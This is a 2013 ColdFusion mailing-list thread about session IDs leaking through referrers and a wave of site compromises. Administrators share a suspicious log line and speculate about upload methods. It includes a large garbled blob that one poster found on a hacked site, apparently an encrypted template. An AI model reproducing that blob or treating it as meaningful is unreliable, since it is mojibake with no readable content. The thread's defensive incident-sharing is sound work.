Re: Anyway to automatically convert to URLSESSIONFORMAT
On Sat, Feb 9, 2013 at 7:55 PM, UXB denn...@uxbinternet.com wrote: From a security perspective cookies are a better option because passing ID's in the open can result in session hijacking when someone bookmarks a link. This isn't even the biggest threat. Since you are passing the SessionID in the URL, it will be included in the referrer string and LOGGED by someone else's server each time you allow a link out from your website. This appears to be the root cause of the recent Yahoo Mail security breaches. This means if you simply link to my website from yours, using a plain jane link - this is all that is required for me to potentially hijack your user's sessions, simply by examining the referrer strings. -Cameron -- Cameron Childress -- p: 678.637.5072 im: cameroncf facebook http://www.facebook.com/cameroncf | twitterhttp://twitter.com/cameronc | google+ https://profiles.google.com/u/0/117829379451708140985 ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354442 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
New Round of Exploits going on
It appears that there are either Web Developers running sites with current infections, or there is a new round happening. I have seen one site hacked twice in the last two weeks, and although they were never able to run the code, there is very little evidence that this exploit is from the web site it was found on. However the one thing that I noticed in the logs at the time of the modified HTML file, and yes they only modified HTML files and not CFML files, was that I found a HEAD request in the logs that came from a website that looked suspicious. When I googled this domain my AntiVirus detected this as a Black Hole Security Exploit, but what was worrying was that this log with the domain had the website that was hacked in the log. And it looks like this with the details changed to protect both parties. 2013-02-06 01:43:48 xxx.xxx.xxx.xxx HEAD / - 80 - xxx.xxx.xxx.xxx Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:18.0)+Gecko/20100101+Firefox/18.0 http://somedomain/?info/d http://luhafaki.eg.vg/?info/andyscott.id.au omainattacked 301 0 0 225 432 125 Now you can see that this was redirected, but if there is a known exploit these guys are still able to do this. As was evident with the latest Anonymous attacks. I encourage people to look at their websites and check to see if they have been infected with this new wave. I have gone through the logs of the website in question and there is no evidence that it was infected directly through the website, except for that one line in the log mentioned above. What really shocks me even more, is that the hosting company refuse to acknowledge that they may be responsible, which is fair enough if this website did not have all the checks to sanitize all form inputs with Anti Sammy. And there is also no evidence that this a SQL Injected attack either, which is near impossible unless there is a known bug with hibernate and its current binding of variables. Aka cfqueryparam for hibernate. Anyway as some people have mentioned that they have been attacked in the last few weeks, I wanted to share this as there seems to be a new exploit going around that may or may not be related to ColdFusion on shared hosts, but they seem to not care who they are infecting. -- Regards, Andrew Scott WebSite: http://www.andyscott.id.au/ Google+: http://plus.google.com/113032480415921517411 ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354443 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
Re: New Round of Exploits going on
I just got the below on a site. Not sure how to decrypt to tell exactly what it's doing though. Client noticed that Google had flagged the site as 'comprimised. I'm pointing my finger at the hosting company - they've got a security issue if this can happen, correct? So, anybody know what this is doing? - Allaire Cold Fusion Template Header Size: New Version@ؤlº²BÃulYLöÂÂhqؤä8X°ɿÃò©ÂP^qvÃNÃÒùFÃû'ÃÃÕ¯Ãe ÂÃÃúÃáÂû!Ãp$sã¨Ã´Ã»Â\vÂùeÃÃÃ¥RV/е ú{ /ýÂèó^t¼ɮ?ÂÃtnÂö³zñ¤îÂ:XÃÖÃ(ÃÃÃ~)ۣ·Â* ì ·mîQPêlÂÂwré(²-ìÂ~s Â#ó(B]±nwÃí¸a TGmÂæalW][÷* Iû(þºú¢ÛÂ@ÂÂÃþk äF±Âî®lÂXFLõR±, Ò ¹Ô(]{ÂÃK~9î®lÂXFLõR±, Âéâ¡[V8cü_èQK^ ¦[AêÃ׻áº8'¹ïVÂcKWà éÃÃUÂhL½ .øá¡R¾ÃWxþÂöî®lÂXFLõR±, ÂTXÃà 8Ãëx«Ã=! ä±ÂWó§ÂÂYªÃå«#}yµ'X X·ÂæNÃ¥VÃͼ¿%V#Â6ÂÃ7à OÃ)Âæ*#pÂPOëPpÂÂÂWó§ÂÂYªÃåà OÂTFÃe X·ð ëo2]ÂÂͼ¿%V#Â6ÂÃ7à ÂáqtÃu!qö¬òÂ:Ã'ÂHÂNî®lÂXFLõR±, ÊƬ³Â,Â8rR+áÂ;¦fTm{$5fIHpOÃÃ-K©o+ÂÃE$f*íÂvÂÃB¥¦fTm{$5fIHpOÃ@Â¥ÃÏ~y`lÃjÃ0z\¸ÿê¬Â©Ã´Â³Â¥pEßµÃ/HÃÃS¸¿-ÃÂ3ú¼äU³ÃÃ׻áº8'¹ïVÂcKWN¡sdDgÂÃùAjÂÂ¥Ãy³Ã¿°Ã{Kî®lÂXFLõR±, Âñ*ÃrÂ?Ý®ÂÃv“ÂÃg¡$Ã9Âî®lÂXFLõR±, :6ôԸT¼}ÃbG¦`ðî¦fTm{$5fIHpOÃ8`Ó Âº2ÃÑÿ¬@à Ã}V|̽ \¸ÿê¬Â©Ã´Â³Â¥pEßµÃ/ÅԽæCϯ£ÂjKNö׻áº8'¹ïVÂcKWì¾ïNüÃ1¨--£s©sKÂðåW׻áº8'¹ïVÂcKWá?ÂÂÃàX·TôÃ^©ª»`ͼ¿%V#Â6ÂÃ7à ÂÃ}£d ½¬p!²E¤ñߴdÂ`'8OYgÕ=â/n׻áº8'¹ïVÂcKWRÃÂ¥t X·fJcÂlþ¸fͼ¿%V#Â6ÂÃ7à ÂÕ¨ R,`ÃÞ·M^R¯ê}OæÂÃͼ¿%V#Â6ÂÃ7à Ãi7pԳ´¯Â¢ÿ*\¸ÿê¬Â©Ã´Â³Â¥pEßµÃ/ðu§Â½(OÃ祹Ã3 ÃpÃÃæ7\¸ÿê¬Â©Ã´Â³Â¥pEßµÃ/gQ ú÷ç¼Ã½quv6TÂÂWó§ÂÂYªÃÃ¥Y~¡Xm»¸ã4ÿöèyoy@QvUcS`׻áº8'¹ïVÂcKWgÂSáÃàX·Dü¥ÂÃÃöͼ¿%V#Â6ÂÃ7à Â#âvû±Ââ8³GÔÂWó§ÂÂYªÃÃ¥Y~¡Xm»ÊƬ³Â,}B½à s¦fTm{$5fIHpOÃddà µ'ÃlÂÂÒ½rm[, ÃÃ¥;ò:WÃçåöby©Eà ¦¨Y!Ã#Âà YsKÂÙ;/׻áº8'¹ïVÂcKWÂÂyó±ýÂ:5IYÂ4)ÃAý!x²Ã׻áº8'¹ïVÂcKWCrFõîZ½ X·òÃâ¬Mͼ¿%V#Â6ÂÃ7à ÂÂðÃ÷¥ºBú÷Âj±Â׻áº8'¹ïVÂcKWÃ¥}°mb¿ X·ï3Ãõ$´ÃÃͼ¿%V#Â6ÂÃ7à Ãeh' wðô޲©é;gZCE ¸£whpî®lÂXFLõR±, 8;Ãù]¾¿¼0î$èìWÃçåöby©Eà ¦¨Y¢p$¸ÂXëÃn ÂÃng»Â·N0ì\¸ÿê¬Â©Ã´Â³Â¥pEßµÃ/´ÂýùÃÃYD¦Â°ÂÂWó§ÂÂYªÃÃ¥cÃS¶ÂHI-ÂÂ0uüÂÃKþÃÃRÂÂBÂÃÃcÂ)¦ͼ¿%V#Â6ÂÃ7à «.ZÂéÃ/ÂÂ_N.G |J\¸ÿê¬Â©Ã´Â³Â¥pEßµÃ/_]\ÃùÂöçOÃÔù¼DZ¡ÅBé0¦fTm{$5fIHpOÕ Ã£DøSÂ4C¬Ã2£3Â.ÂæalW][÷* óÂ2¢Âôà ÂX¨ÄÂUNM± §é¥÷Â׻áº8'¹ïVÂcKWZ¸;å´ü X·Â;ÃQ|dKͼ¿%V#Â6ÂÃ7à ¤ÂPï©õÂÃS5ñÃB£P1²¿ÂÂÂWó§ÂÂYªÃÃ¥cÃS¶ÂHIxÂ)«%Pý²v1°Ãá¦fTm{$5fIHpOÕ¤aÃQz]¬[ç@ºÃìéfæÂ.DÃgä/WÃçåöby©Eà ¦¨YnÂ.ÂÂÃrHýSámÃ.Z׻áº8'¹ïVÂcKW»Ã.Hú®c:5IYÂ4)Ã4Ãݪ'ÂHÂNî®lÂXFLõR±, ¥ãÂJÂ¥3±ÂÂTÂEWÃçåöby©Eà ¦¨YºùÂÃÃà ԩÃ[ÃîX¢EáYeÃlúîïlÂÂWó§ÂÂYªÃÃ¥cÃS¶ÂHI{±ñévøÂ9}¦ _¦fTm{$5fIHpOÃnÂaîó(WÂÂ+úà ¥NÂÃ\#ÃWÃçåöby©Eà ¦¨Y)ÂÃOÂÂÃpÃ)æÃÃÃ׻áº8'¹ïVÂcKWôåÃAãåÃ:5IYÂ4)ÃÃJÖ¥ô׻áº8'¹ïVÂcKWõºþðA\õ X·Ã!þFs¸!eͼ¿%V#Â6ÂÃ7à þï±Ã¾w0wQÐQÂwGÝeSyÇð¯¦fTm{$5fIHpOÕ¢SÃò ¤qòðëÂ1ÂxO ÂæalW][÷* 9®FóÂBWQÉl0ÊÃÃvñÂÂóÃ\¸ÿê¬Â©Ã´Â³Â¥pEßµÃ/ WHÂq²¦¹ÿÃomÃòÂÂWó§ÂÂYªÃå«#}yµ'XÂéâ¡[V8cà I¼ÂLÂdӽóývöÂæalW][÷* 0ÂI ÂÂñ}_p6R¯ ]Ãî®lÂXFLõR±, ZqÙZTgW¥åÂø[Â\ f´qêWÃçåöby©Eà ¦¨Y0 FãÂ4Â÷ÃzèԶA¢׻áº8'¹ïVÂcKW4ðGTê¤+·:5IYÂ4)ÃHmûÂ=Oѱì{E Ã2ͼ¿%V#Â6ÂÃ7à ~Ãëô^Â'Ã\¸ÿê¬Â©Ã´Â³Â¥pEßµÃ/¼tmAZmÂgäi£Ãm6lüÂÂÂæalW][÷* b²?Ãà r;Âñ}_ÃÃ6wÃuÃdî®lÂXFLõR±, ûÂýzÂ.Âi½$þÂ*j9 '¨ÂÂWó§ÂÂYªÃå«#}yµ'XÂÎQ¿(Õ¾Â÷ÂåئfTm{$5fIHpOÃÃjr$¿ÃÃÃûI£ä£G ërÂÂ}Ã+DÂÂWó§ÂÂYªÃå«#}yµ'X{±ñévøTùdv§òi¦fTm{$5fIHpOÃÃî¯Tȯûk.1 L½ð¹ÂÂWó§ÂÂYªÃå«#}yµ'X:6ôԸT¼/*²-¦fTm{$5fIHpOÕ²;Ã70yÃ\^«årÂÂr2þOTWÃçåöby©Eà ¦¨Y5 wÂÃÙ ÃóìyÃU2׻áº8'¹ïVÂcKWýº²´Â ?:5IYÂ4)Ä^(·:;hÂæalW][÷* ÂE3 )¨hkeF²ÃdÂ1OOåò î®lÂXFLõR±, ÂYòÂÃ[cà ûäéÂÿ¿C|ÃÃqÂæalW][÷* Ã(Ãõ#|Q »s7EHÂèyvà ²Ãaî®lÂXFLõR±,
Re: New Round of Exploits going on
One thing I hate about some hosting companies is that they have Robust Exceptions switched on, but what concerns me even more is that they don't care that this is a security risk... If your hosting company is one of them, get in their ears about having it switched off. If they refuse then its time for a change. Also as a caution not a rule, if your lucky enough to have the time, look into using any framework that supports MVC and SES rewrites, this has stopped them in their tracks as they are not able to run the uploaded code. Not with ease at least anyway. Still I am not sure how they are uploading these files, as there is nothing in the logs that indicates this. I am guessing that something else on the server is compromised and because they are able to and do look for exceptions being displayed to the screen they now know where to start spreading their malware. My guess is there is an exploit still know and not public that is bypassing all sand boxing at the moment. -- Regards, Andrew Scott WebSite: http://www.andyscott.id.au/ Google+: http://plus.google.com/113032480415921517411 ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354445 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
Re: New Round of Exploits going on
Still I am not sure how they are uploading these files as there is nothing in the logs that indicates this. For mine in the previous message, the altered file still had the ORIGINAL creation date on it - 2011 something - although it was altered last week. So, a search of all the site files for anything recently altered showed nothing. ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354446 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
Re: New Round of Exploits going on
That would indicate that they where able to get the file stamp before modifying it and reapplying the time stamp Extreme long shot, but who knows how they are doing this. -- Regards, Andrew Scott WebSite: http://www.andyscott.id.au/ Google+: http://plus.google.com/113032480415921517411 On Mon, Feb 11, 2013 at 4:43 PM, Les Mizzell lesm...@bellsouth.net wrote: Still I am not sure how they are uploading these files as there is nothing in the logs that indicates this. For mine in the previous message, the altered file still had the ORIGINAL creation date on it - 2011 something - although it was altered last week. So, a search of all the site files for anything recently altered showed nothing. ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354447 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm